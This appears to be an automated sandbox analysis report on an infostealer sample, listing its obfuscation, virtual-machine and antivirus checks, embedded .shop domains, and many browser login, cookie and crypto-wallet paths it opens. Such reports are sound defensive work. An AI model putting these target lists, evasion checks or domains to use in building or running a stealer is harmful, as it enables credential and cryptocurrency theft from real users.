            Source: 20qMFnd9tO.exe, 00000000.00000003.1632039093.0000000002DA4000.00000004.00000800.00020000.00000000.sdmp, 20qMFnd9tO.exe, 00000000.00000003.1632383321.0000000002D79000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: 20qMFnd9tO.exe | ReversingLabs: Detection: 38%
            Source: 20qMFnd9tO.exe | Virustotal: Detection: 38%
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | File read: C:\Users\user\Desktop\20qMFnd9tO.exe
            Source: unknown | Process created: C:\Users\user\Desktop\20qMFnd9tO.exe "C:\Users\user\Desktop\20qMFnd9tO.exe"
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7556 -s 1556
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | File opened: C:\Windows\SysWOW64\msvcr100.dll

            Data Obfuscation

            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | Unpacked PE file: 0.2.20qMFnd9tO.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | Unpacked PE file: 0.2.20qMFnd9tO.exe.400000.0.unpack
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | Code function: 0_3_008A59B9 pushfd ; retf | 0_3_008A598D
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | Code function: 0_3_008A5342 pushfd ; retf | 0_3_008A53A5
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | Code function: 0_3_008A5978 pushfd ; retf | 0_3_008A598D
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | Code function: 0_2_0043E05C push ss; retf | 0_2_0043E099
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | Code function: 0_2_0043CE48 push es; retn 0043h | 0_2_0043CE49
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | Code function: 0_2_007DF004 pushad ; retf 007Dh | 0_2_007DF035
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | Code function: 0_2_007E1590 push ebp; ret | 0_2_007E1592
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | System information queried: FirmwareTableInformation
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe TID: 7576 | Thread sleep time: -150000s >= -30000s
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe TID: 7576 | Thread sleep time: -30000s >= -30000s
            Source: Amcache.hve.3.dr | Binary or memory string: VMware
            Source: Amcache.hve.3.dr | Binary or memory string: VMware Virtual USB Mouse
            Source: Amcache.hve.3.dr | Binary or memory string: vmci.syshbin
            Source: Amcache.hve.3.dr | Binary or memory string: VMware, Inc.
            Source: Amcache.hve.3.dr | Binary or memory string: VMware20,1hbin@
            Source: Amcache.hve.3.dr | Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
            Source: Amcache.hve.3.dr | Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
            Source: Amcache.hve.3.dr | Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
            Source: 20qMFnd9tO.exe, 00000000.00000003.1631574292.0000000000858000.00000004.00000020.00020000.00000000.sdmp, 20qMFnd9tO.exe, 00000000.00000003.1704319206.0000000000858000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
            Source: Amcache.hve.3.dr | Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
            Source: Amcache.hve.3.dr | Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
            Source: Amcache.hve.3.dr | Binary or memory string: c:/windows/system32/drivers/vmci.sys
            Source: Amcache.hve.3.dr | Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
            Source: Amcache.hve.3.dr | Binary or memory string: vmci.sys
            Source: Amcache.hve.3.dr | Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
            Source: Amcache.hve.3.dr | Binary or memory string: vmci.syshbin`
            Source: Amcache.hve.3.dr | Binary or memory string: \driver\vmci,\driver\pci
            Source: Amcache.hve.3.dr | Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
            Source: 20qMFnd9tO.exe, 00000000.00000003.1631574292.0000000000858000.00000004.00000020.00020000.00000000.sdmp, 20qMFnd9tO.exe, 00000000.00000003.1704319206.0000000000858000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWR
            Source: Amcache.hve.3.dr | Binary or memory string: VMware20,1
            Source: Amcache.hve.3.dr | Binary or memory string: Microsoft Hyper-V Generation Counter
            Source: Amcache.hve.3.dr | Binary or memory string: NECVMWar VMware SATA CD00
            Source: Amcache.hve.3.dr | Binary or memory string: VMware Virtual disk SCSI Disk Device
            Source: Amcache.hve.3.dr | Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
            Source: Amcache.hve.3.dr | Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
            Source: Amcache.hve.3.dr | Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
            Source: Amcache.hve.3.dr | Binary or memory string: VMware PCI VMCI Bus Device
            Source: Amcache.hve.3.dr | Binary or memory string: VMware VMCI Bus Device
            Source: Amcache.hve.3.dr | Binary or memory string: VMware Virtual RAM
            Source: Amcache.hve.3.dr | Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
            Source: 20qMFnd9tO.exe, 00000000.00000002.1814774211.000000000080A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW@
            Source: Amcache.hve.3.dr | Binary or memory string: vmci.inf_amd64_68ed49469341f563
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | Process information queried: ProcessInformation
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | Code function: 0_2_006E092B mov eax, dword ptr fs:[00000030h] | 0_2_006E092B
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | Code function: 0_2_006E0D90 mov eax, dword ptr fs:[00000030h] | 0_2_006E0D90
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | Code function: 0_2_007DFDA3 push dword ptr fs:[00000030h] | 0_2_007DFDA3

            HIPS / PFW / Operating System Protection Evasion

            Source: 20qMFnd9tO.exe | String found in binary or memory: enthusiasimtitleow.shop
            Source: 20qMFnd9tO.exe | String found in binary or memory: worryfillvolcawoi.shop
            Source: 20qMFnd9tO.exe | String found in binary or memory: cleartotalfisherwo.shop
            Source: 20qMFnd9tO.exe | String found in binary or memory: wagonglidemonkywo.shop
            Source: 20qMFnd9tO.exe | String found in binary or memory: pillowbrocccolipe.shop
            Source: 20qMFnd9tO.exe | String found in binary or memory: communicationgenerwo.shop
            Source: 20qMFnd9tO.exe | String found in binary or memory: diskretainvigorousiw.shop
            Source: 20qMFnd9tO.exe | String found in binary or memory: affordcharmcropwo.shop
            Source: 20qMFnd9tO.exe | String found in binary or memory: dismissalcylinderhostw.shop
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | Queries volume information: C:\ VolumeInformation
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
            Source: Amcache.hve.3.dr | Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
            Source: Amcache.hve.3.dr | Binary or memory string: msmpeng.exe
            Source: Amcache.hve.3.dr | Binary or memory string: c:\program files\windows defender\msmpeng.exe
            Source: 20qMFnd9tO.exe, 00000000.00000002.1814961062.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, 20qMFnd9tO.exe, 00000000.00000003.1683082452.00000000008B5000.00000004.00000020.00020000.00000000.sdmp, 20qMFnd9tO.exe, 00000000.00000003.1704319206.00000000008B7000.00000004.00000020.00020000.00000000.sdmp, 20qMFnd9tO.exe, 00000000.00000003.1704561901.0000000000824000.00000004.00000020.00020000.00000000.sdmp, 20qMFnd9tO.exe, 00000000.00000003.1704184420.00000000008B6000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
            Source: Amcache.hve.3.dr | Binary or memory string: MsMpEng.exe
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

            Stealing of Sensitive Information

            Source: Yara match | File source: sslproxydump.pcap, type: PCAP
            Source: Yara match | File source: decrypted.memstr, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: 20qMFnd9tO.exe PID: 7556, type: MEMORYSTR
            Source: 20qMFnd9tO.exe, 00000000.00000003.1631783820.00000000008A5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: "p": "%appdata%\\Electrum\\wallets",
            Source: 20qMFnd9tO.exe, 00000000.00000003.1640623370.0000000002D7B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: Edge/Default/Extensions/Jaxx LibertyB
            Source: 20qMFnd9tO.exe, 00000000.00000003.1631783820.00000000008A5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: "m": ["app-store.json", ".finger-print.fp", "simple-storage.json", "window-state.json"],
            Source: 20qMFnd9tO.exe, 00000000.00000003.1631783820.00000000008A5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: "p": "%appdata%\\Exodus\\exodus.wallet",
            Source: 20qMFnd9tO.exe | String found in binary or memory: Edge/Default/Extensions/ExodusWeb3
            Source: 20qMFnd9tO.exe, 00000000.00000002.1814381070.0000000000197000.00000004.00000010.00020000.00000000.sdmp | String found in binary or memory: 5Aapp-store.jsonAWallets/BinanceC:\Users\user\AppData\Roaming\BinanceA%appdata%\Binance f
            Source: 20qMFnd9tO.exe, 00000000.00000003.1631783820.00000000008A5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: "p": "%appdata%\\Ethereum",
            Source: 20qMFnd9tO.exe, 00000000.00000003.1704561901.000000000081E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
            Source: 20qMFnd9tO.exe, 00000000.00000003.1704561901.000000000081E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: keystore
            Source: 20qMFnd9tO.exe, 00000000.00000002.1814381070.0000000000197000.00000004.00000010.00020000.00000000.sdmp | String found in binary or memory: 5AWallets/Ledger Live{4AC:\Users\user\AppData\Roaming\Ledger Live+Y)A%appdata%\Ledger Live
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | File opened: C:\Users\user\Application Data\Mozilla\Firefox
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.db
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqlite
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.json
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\z6bny8rn.default\key4.db
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
